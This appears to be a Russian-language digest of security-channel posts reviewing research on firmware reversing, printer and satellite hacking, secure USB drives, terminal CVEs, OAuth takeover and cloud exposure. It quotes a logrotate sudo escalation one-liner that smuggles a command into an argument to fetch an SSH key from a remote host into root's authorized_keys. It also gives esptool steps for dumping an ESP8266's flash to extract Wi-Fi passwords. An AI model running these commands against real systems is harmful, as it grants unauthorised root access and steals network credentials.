A Big Look at OpenAPI Security
Пост рассматривает какие возможности безопасности дает нам OpenAPI, что на самом деле делают большие и малые компании и что вам следует делать, когда вы создаете свой собственный API.
Вроде есть стандарты и спецификации, но по факту нередко при разработке одни и те же вещи реализованы по разному.
TL;DR Используйте OAuth2 и apiKey.
Reversing ESP8266 Firmware
Интересный цикл статей по реверсу прошивки платы на ESP8266.
Реверс сам по себе не самое простое занятие, а реверс хоть и популярного, но несколько нестандартного для таких целей устройства с не самой привычной архитектурой процессора только добавляет сложности.
Оглавление:
- Part 1:
- Introduction
- Part 2:
- Initial analysis
- Questions we need to answer
- Part 3:
- What is it?
- Understanding the firmware format
- Understanding the boot process
- Understanding the physical memory layout
- Part 4:
- Writing an IDA loader
- Performing library recognition
- Fixing IDB2PAT
- Generating our pattern file
- Part 5:
- Recognising VTABLE’s
- Finding the port knock sequence
- Understanding the Xtensa instruction set
- Understanding the Xtensa calling convention
- Part 6:
- Reversing the loop function
- Getting the secrets!
- Conclusion
- References
- Tools
- Feedback
Статья будет интересна не только лишь всем, но основательность подхода может впечатлить даже людей далёких от IoT.
Cracking the final frontier: Reverse engineering and exploiting LEO satellites.
Взлом спутников уже давно далеко ушёл от спутниковой рыбалки и радиохулиганов на SATCOM. За условные 20 лет мир спутников изменился, от кастомных сложных решений мы пришли к простым спутникам на привычные многим решения на AVR, а связь со спутниками это не только UHF, но и свои протоколы вроде Cubesat Space Protocol, стэка CCSDS и так далее.
Но не смотря на рост числа различных низкоорбитальных спутников, с безопасностью там множество проблем. Возможно, считается что спутник сложная цель для взлома, но как показывает практика, человек с ноутбуком, SDR и прямыми руками достаточно просто эту цель достанет.
P.S. Так же на 1 марта 2024 года запланирован воркшоп SpaceSec 2024. Будут ли записи докладов не известно, но если тема интересна, советую данное мероприятие отслеживать\посетить (вдруг вы в Сан Диего или собираетесь туда).
Your printer is not your printer! Райтапы от Devcore с Pwn2Own в двух частях.
За последние несколько лет принтер стал одним из основных устройств в корпоративной интрасети, и его функциональные возможности также значительно расширились. Для удобства использования поддерживаются не только печать или отправка факсов, но и облачные сервисы печати, например AirPrint. Прямая печать с мобильных устройств стала основным требованием в эпоху IoT. Их также используют его для печати внутренних деловых компании, что делает обеспечение безопасности принтеров еще более важным занятием.
Но чем сложней и умней становятся принтеры и МФУ, тем большую проблему они могут и создать.
В прицел исследователей попали довольно популярные аппараты:
- HP Color LaserJet Pro M479fdw
- Lexmark MC3224i
- Canon imageCLASS MF743Cdw
В 2021 году ребята обнаружили RCE (CVE-2022-24673 и CVE-2022-3942) в принтерах Canon и HP, а также уязвимость (CVE-2021-44734) в Lexmark. Они использовали эти уязвимости для эксплуатации Canon ImageCLASS MF644Cdw, HP Color LaserJet Pro MFP M283fdw и Lexmark MC3224i на Pwn2Own Austin 2021.
Статьи в их блоге:
- Your printer is not your printer! - Hacking Printers at Pwn2Own Part I
- Your printer is not your printer! - Hacking Printers at Pwn2Own Part II
Hacking Some More Secure USB Flash Drives
Защищенные USB-флешки выглядят интересно, вендоры завлекают аппаратным шифрованием AES 256-bit, неизвлекаемостью данных и прочей супернадёжной секурностью. Но практика показывает, что такая защита работает от случайных людей, и фактически защита не так надёжна, как вещают маркетологи.
В руки SySS попались два устройства от Vibratim: Verbatim Keypad Secure и Verbatim Executive Fingerprint Secure SSD.
Оба накопителя по сути являются внешним кейсом для M.2 SSD с дополнительной обвязкой вроде контроллеров и пинпадов\сканера отпечатков.
Hacking Some More Secure USB Flash Drives (Part I)
Первым на препарирование попал Verbatim Keypad Secure.
Вендором заявлено, что что перебор пароля не возможен, на ввод пароля даётся 20 попыток, после чего накопитель переинициализируется, однако оказалось, что фактически эта защита не работает. Анализ прошивки показал, что данные всё же извлекаются, данные для для аутентификации пользователя хранится в специальном блоке на SSD, а длинна пароля от 5 до 12 цифр сильно упрощает дело.
Попутно найденные проблемы получили CVE:
CVE-2022-28384
CVE-2022-28382
CVE-2022-28383
CVE-2022-28386
PoC: Hacking a Secure USB Flash Drive // Unauthorized Access to Verbatim Keypad Secure (CVE-2022-28384)
Hacking Some More Secure USB Flash Drives (Part II)
Вторым препариловался Verbatim Executive Fingerprint Secure SSD.
В данном случае всё было ещё интересней, Executive Fingerprint Secure SSD эмулирует CD-привод с клиентским ПО, хоть всё взаимодействие зашифровано AES, ключ шифрования захардкожен.
Попутно найденные проблемы получили CVE:
CVE-2022-28387
CVE-2022-28382
CVE-2022-28383
CVE-2022-28385
PoC: Hacking Yet Another Secure USB Flash Drive // Verbatim Executive Fingerprint Secure (CVE-2022-28387)
Готовых тулов не положили, но в целом это наглядное напоминание, что нельзя в съемных носителях надеяться только на аппаратное шифрование.
Blue2thprinting (blue-[tooth)-printing]: answering the question of 'WTF am I even looking at?!
Dark Mentor LLC настолько преисполнились в изучении Bluetooth, что решили добавить одонтологию в изучение синезубых устройств.
Как всегда, всё довольно увлекательно, так как в мире Bluetooth всё устроено довольно своеобразно.
Слайды:
Blue2thprinting_Hardweario2023_Slides_With_Builds
Видео с доклада ещё нет, но ждем на канале hardweario/videos">hardwear.io.
Obfuscating C2 During a Red Team Engagement
Статья от Jumpsec Labs, на примерах раскрывающая что такое Redirectors в контексте C2 и Red Team.
Тема довольно интересная, но редко освещаемая.
Кто-то собирает хоум-лабы чтобы строить инфраструктуру, кто-то строит хоум-лабы чтобы строить и ломать инфраструктуру, а кто-то собирает лабу для хакинга железок.
Основное оборудование:
- защита от статики
- паяльник/паяльная станция
- мультиметр
- микроскоп
- осцилограф
- анализатор логики
- блоки питания
- анализаторы частт
- и различные JTAG, UART, флэш ридеры, провода и различная мелочёвка.
В силу того, что большая часть ссылок ведет на amazon, закупаться необходимым чуть сложнее, но статью можно использовать как референсный список, что может пригодиться.
На днях появился целый Offensive ML Framework.
Автор собирает различные TTP на основе разных ML-инструментов.
На текущий момент данный фреймворк больше похож на подборку ссылок, но автор заявляет, что работы ведутся.
Пока выглядит не очень полезно, но продолжаем наблюдение.
Хорошие новости подвезли.
У sshfs появился мейнтейнер и проект больше не orphaned.
Пока что обновился readme и начались хоть какие-то именения в коде.
Пока что радоваться особо нечему, но новость даёт надежды на продолжение жизни проекта.
Для тех, кто пропустил:
Предыдущий мейнтейнер Nikolaus Rath по каким-то своим причинам оставил проект в 2022, после чего проект оставался в "осиротевшем" состоянии.
AWS Digital Sovereignty Pledge: Announcing a new, independent sovereign cloud in Europe
Небольшая новость от AWS. Они запускают "суверенное облако" в Европе. Деталей в новости нет, но вероятно это и есть AWS ISOE (про который я писал ранее). У AWS много точек присутсвия (8 регионов и 24 зоны доступности) и казалось бы, что ничего нового. Но судя по всему, расчет идёт на более требовательную публику, вроде здравоохранения, банков и правительства.
It's Alive!
Youtube-канал Androkavo/">Androkavo ожил и после почти пяти лет молчания выпустил видео.
Если вы не понимаете, о чём я: Androkavo один из самых крутых каналов, посвященных пайке. Никакого бубнежа за кадром, только паяльник, припой, флюс и филигранная работа.
Если вы любите запах напалма припоя поутру, канал обязателен к просмотру.
Youtube решил довольно своеобразно бороться с блокировщиками рекламы.
Правда оно может не работать и с выключенным блокировщиком. ¯\_(ツ)_/¯
На r/uBlockOrigin нашли решение по обходу блокировки блокировщиков.
ipapi.is: How to build a IP Geolocation Database from Scratch?
Интересный и довольно простой подход в сборе своей базы geoip:
собрали данные у региональных интернет-регистраторов, обогатили данные и получили продукт на выходе.
Сами базы geoip в открытом доступе и их можно скачать.
root with a single command: sudo logrotate
Вопрос: что может произойти, если пользователь может запустить только sudo logrotate
?
Кажется, что если sudoers выглядит так
user ALL=(ALL:ALL) NOPASSWD: /usr/sbin/logrotate *то проблем быть не должно.
sudo logrotate -l /etc/cron.daily/man-db '2>/dev/null;wget host/ssh.key -O /root/.ssh/authorized_keys2; exit 0;'Интересное исследование интересного вектора атаки. Советую почитать целиком. Читать полностью…
Guarding Your Domain: The No-Cost Approach with Free and Open Source Software
Мониторить свои домены и поддомены штука нужная и полезная. Если у вас инфраструктура не очень большая, или же IaC, то проводить инвентаризацию не сложно. Но если всё сделано по старинке, то лучше это привести к нормальному виду.
Случается, что могли что-то забыть, и поддомен или даже домен уже занят машиной, которая вам не пренадлежит.
В целом, такая защита домена немного похожа на обычную разведку. Собираем вероятные домены, проверяем поддомены и всё с использованием знакомого инструментария:
- gospider
- amass
- crt.sh
Однако есть и разница - поиск схожих доменных имён.
Для поиска схожих имен можно использовать сервис - https://dnstwist.it/ (есть cli-утилита).
Так же можно использовать phishing_catcher
В целом, держите dns-записи в порядке и используйте IaaC если инфраструктура большая.
Living Like It's 99: No Social Media, No Smartphone
Как отказаться от смартфона, удалить аккаунты в соц. сетях и обрести душевное спокойствие.
Грегори Альварез, автор статьи, решил провести эксперимент, который затянулся на годы. Начальной причиной отказа от социальных сетей и смартфона стала проблема с приватностью, и продолжилось отказом от дешёвого дофамина и боязни пропустить интересное.
Похожий эксперимент по отказу от смартфона проводил Мэтт Д'Авелла (видео на канале Мэтта, переведённое видео от Kramarty TV), но в его случае это был тридцатидневный эксперимент, который нельзя назвать бесполезным.
Разумеется, Грегори отказался не от всех девайсов:
- Garmin Fenix 5 Plus для музыки и навигации
- GoPro Hero5 Session для фото и видео
- Aeku M5 в роли простой звонилки
Без мессенджеров автор тоже не остался, и использует десктопную версию Signal.
Вне поля зрения статьи остался компьютер, но сложно быть специалистом по безопасности без компьютера.
В какой-то мере это похоже на модный "цифровой детокс", но вопрос действительно довольно насущный. И это история не столько про успешный успех или эффективную эффективность, сколько про то, что тревожный примат стал ещё более тревожным, уткнувшись в телефон листая соц. сети и бесконечные видео, которые просто поедают наше время, давая в замен только разочарования и кислое послевкусие.
Статья в блоге автора:
Living Like It's 99: No Social Media, No Smartphone
Статья в pdf:
Living Like It's 99: No Social Media, No Smartphone.pdf
Oh-Auth - Abusing OAuth to take over millions of accounts
Если следили за новостями в этом году, то были сообщения о том, что находили уязвимости аутентификации в Booking (Traveling with OAuth - Account Takeover on Booking.com), Vidio.com, Grammarly и куче других сервисов.
Исследователи из компании Salt Security выпустили большую статью о том, как эту уязвимость обнаружили, и как оно устроено и работает.
Изначально проблема была обнаружена ещё в феврале этого года, и в ряде случаев исправлено. Однако, закрыта ли уязвимость целиком вопрос открытый.
ANSI Terminal security in 2023 and finding 10 CVEs.
Крутое исследование от Дэвида Лидбейта по поиску уязвимостей в эмуляторах терминалов с акцентом на ПО с открытым кодом. В результате было обнаружено 10 CVE для эмуляторов терминалов, которые могут привести к удаленному выполнению кода (Remote Code Execution, RCE), а также различные другие ошибки.
Менее техническое описание можно почитать здесь:
The Terminal Escapes: Engineering unexpected execution from command line interfaces
Найденные CVE в различных эмуляторах терминала:
- CVE-2022-45872 - iTerm2 DECRQSS
- CVE-2022-44702 - Windows Terminal + WSL working directory
- CVE-2022-47583 - mintty DECRQSS
- CVE-2022-45063 - xterm OSC 50
- CVE-2022-46387 - ConEmu Title
- CVE-2023-39150 - ConEmu Title Take 2
- CVE-2022-4170 - rxvt-unicode background
- CVE-2022-23465 - SwiftTerm DECRQSS
- CVE-2022-46663 - less OSC 8
- CVE-2023-39726 - mintty OSC 50
- CVE-2023-40359 - xterm ReGIS
- CVE-2023-40216 - OpenBSD wscons parameter overflow
Keylogger keyboard leaks passwords via Apple's "Find My" location network.
"Find My" от Apple может помочь не только найти потерянное устройство, но пароли.
Каким образом?
С кейлогера на ESP32 в клавиатуре.
Фабиан Браунляйн из Positive Security интегрировал кейлогер с Bluetooth на ESP32 в USB-клавиатуру, чтобы показать запись вводимых паролей и их последующую передачу по Bluetooth. Используя такое устройство, злоумышленники могут незаметно, в обход всех мер безопасности в локальной сети, подсматривать пароли и пересылать их себе через iPhone и другие устройства Apple, находящиеся поблизости.
Браунляйн обнаружил и раскритиковал тот факт, что "Find My" обладает определенным потенциалом для злоупотреблений, еще весной 2021 года. Проблема существует и сейчас, спустя почти три года, что доказывает недавний эксперимент, в ходе которого Браунляйн встроил кейлоггер в USB-клавиатуру. Все, что набирается на клавиатуре, передается через сеть Apple "Find My" на компьютер злоумышленника, который может находиться в любой точке мира.
Статья в heise.de: Keylogger keyboard leaks passwords via Apple's "Find My" location network
Чуть более подробная статья там же: c't deckt auf: Keylogger nutzt Apples Ortungsnetz "Wo ist?" (paywall)
Тот самый PoC из 2021: github.com/positive-security/send-my
Видео с объяснением и демонстрацией: We hacked Apple's "Find My" network!
Detecting and annoying Burp users. (web.archive.com)
Занятная статья из 2021 года.
Пользователи Burp Suite в ходе работы могут себя обнаружить, причём не только на каких-то сложных вещах, будь то JA3, но и на банальном user-agent.
Похожая проблема была описана в рамках CTF другим автором.
Но детектом дело не ограничивается, довольно тривиально ловится Intruder и ограничивается активное сканирование.
А "cheese separated values", ломающий краулинг это вообще нечто шедевральное:
<a href="🧀">one</a>Сложно сказать об актуальности статьи на данный момент, но наблюдать на вечной борьбой меча и щита всегда интересно. Читать полностью…
<a href="2.html">
Ребятам из различных Red Team не чужд IaC и иногда попадают довольно интересные проекты.
WolfPack - проект, использующий Terraform и Packer для развертывания редиректоров Apache, которые имитируют подлинные веб-сайты.
Из клауд-провайдеров поддерживается только AWS.
Выглядит интересно, но проект ещё в разработке, так что могут возникать ошибки.
Документация проекта.
В последние дни со Stepik начался какой-то исход курсов, где были задачи с терминалом Linux.
Формулировка автров курсов примерно следующая:
C 31 октября 2023 года Stepik не поддерживает задачи со встроенным терминалом Linux, так как они редко используются и требуют значительных ресурсов на поддержку.
Задания удалят, баллы пересчитают.
Задачи с терминалом на Stepik были не без проблем (регулярные тормоза как пример), однако новости от платформы я не нашёл.
Держу в курсе.
А тут Scapy в браузере появился.
Есть ограничения:
- не работают функции ввода/вывода (send, sr, sniff и т.д.).
- Все, что использует внешние пакеты (matplotlib, pyx и прочее) не поддерживается.
Забытый IoT как способ попасть в сеть.
IoT штука удобная. Включать свет, двигать шторы, перекрывать воду и многое другое можно делать с телефона. Красота.
Разумеется, заботливые производители привязывают свои железки к своим облачным сервисам, а неблагодарные пользователи не хотят и прошивают купленные на свои кровные устройства кастомными прошивками.
Но, разумеется, и это перекрывает не все проблемы.
При наличии физического доступа к устройству можно извлечь имя точки доступа и пароль.
Рассмотрим на примере проекта WLED на ESP8266.
Нам потребуются:
1. Сам ESP8266
2. Программатор USB-UART (в моём случае будет Flipper Zero)
3. 4 соединительных провода
4. макетная плата (опционально)
5. esptool и pyserial (не обязательно он, мне так удобней смотреть порт USB-UART)
Подключаемся:
1. Подпаиваемся или ставим на макетку наш ESP8266.
2. Подключаем USB-UART
3. Проверяем, что порт на местеpyserial-ports -v
4. Переводим плату в режим прошивки. Для этого нажимаем и удерживаем кнопку FLASH, нажимаем кнопку RST и отпускаем. После перезагрузки диод гореть не должен.
/dev/ttyACM0
desc: Flippername
hwid: USB VID:PID=0333:4542 SER=flip_flippername LOCATION=1-1:1.0
1 ports found
5. Опрашиваем ESP для проверки корректности работы:esptool --baud 115200 --chip esp8266 --port /dev/ttyACM0 chip_id
Если всё сделано верно, мы получим информацию о плате.
6. Дампим прошивку:esptool --baud 115200 --port /dev/ttyACM0 read_flash 0x00000 0x400000 flash2_4M.bin
6. По окончанию загрузки нам потребуется просто посмотреть строки в файле:strings flash2_4M.bin| grep "psk"
И мы получаем имя точки доступа и пароль.
strings flash2_4M.bin| grep "ssid"
Да, я не могу назвать это каким-то сложным и полезным ресёрчем, но это показывает, что умные реле, лампочки и прочий IoT хранит пароли в открытом виде.
Для полноты картины надо будет проверить на других устройствах с родными прошивками, но тут уж как получится.
И не забывайте, s in IoT stands for security.
Что такое матрица MITRE ATT&CK ? Обзор, основные сведения и сценарии применения
Хорошее обзорное видео MITRE ATT&CK. Немного истории, варианты применения и пара сценариев из опыта.
Вообще по MITRE ATT&CK материалов на русском не очень много, что довольно странно, так как штука полезная.
Небольшое исследование от Cloud Security Partners.
Около 5% процентов от их клиентов держат AWS RDS в публичном доступе. Да, процент довольно небольшой, но это отдельно взятый случай, фактически их куда больше.
Эта тенденция может не слишком распространена, но для многих пользователей о ней важно знать - особенно для тех, кто предъявляет строгие требования к соблюдению нормативных требований. Но в любом случае, суть статьи: держите вещи подальше от публичного Интернета, если они там не нужны. В большинстве случаев RDS это не требует.
RDS имеет несколько платформ баз данных (не только MySQL), которые могут выбирать пользователи, и среди них есть несколько различных поддерживаемых вариантов аутентификации, которые описаны в документации - Database authentication with Amazon RDS. Таким образом, угроза заключается не только в атаке с подбором пароля, но и в компрометации пользователя IAM или через компрометацию Kerberos. Ситуация с компрометацией учетных данных пользователя более вероятна.
Хотя URL-адрес экземпляра трудно угадать, его можно узнать просмотрев исходный код. Например, поиск us-west-1.rds.amazonaws.com в поиске кода на GitHub дает более 1.8k совпадений файлов и более 5k для us-west-2.rds.amazonaws.com. И при просмотре публичных (в частных наверняка тоже) репозиториев кода довольно часто встречаются строки подключения к базам данных.
Рекомендации:
- Проверяйте RDS на общедоступность
aws rds describe-db-instances --profile your-profile | jq -r ".DBInstances[] | select(.PubliclyAccessible == true)"- По возможности развертывайте экземпляры RDS в том же VPC, что и серверы приложений.
Пиджаки в облаках. AWS для ЦРУ.
AWS большой облачный провайдер, с множеством дата-центров, регионов, сервисов и множеством удобных вещей.
Но очевидно, что AWS это не только public cloud и free tier для VPN, но и множество вещей, скрытых от обычного пользователя.
Disclaimer
Данная статья не является “срывом покровов”, долгосрочным результатом работы кибер-разведки, или иной формой откровения. Это наглядный пример, что немалое количество информации можно получить просто почитав документацию и файлы конфигурации.
Это применимо не только к основному продукту, но и к сторонним инструментам.
Detect Wi-Fi deauthentication attack using ESP8266 and receive notification on smartphone
Как с помощью булки хлеба и отверток ESP8266 детектить deauth атаки на Wi-Fi и не привлекать внимания санитаров получать SMS-оповещения.
Автор использует DeauthDetector, немного расширяя его функционал.
Выглядит довольно своеобразно, но как PoC выглядит интересно.
И наконец, самый простой вариант hexed.it - hex-редактор работающий в браузере.
Основной функционал на месте, если нужно посмотреть\изменить небольшой файл здесь и сейчас, то вполне себе вариант.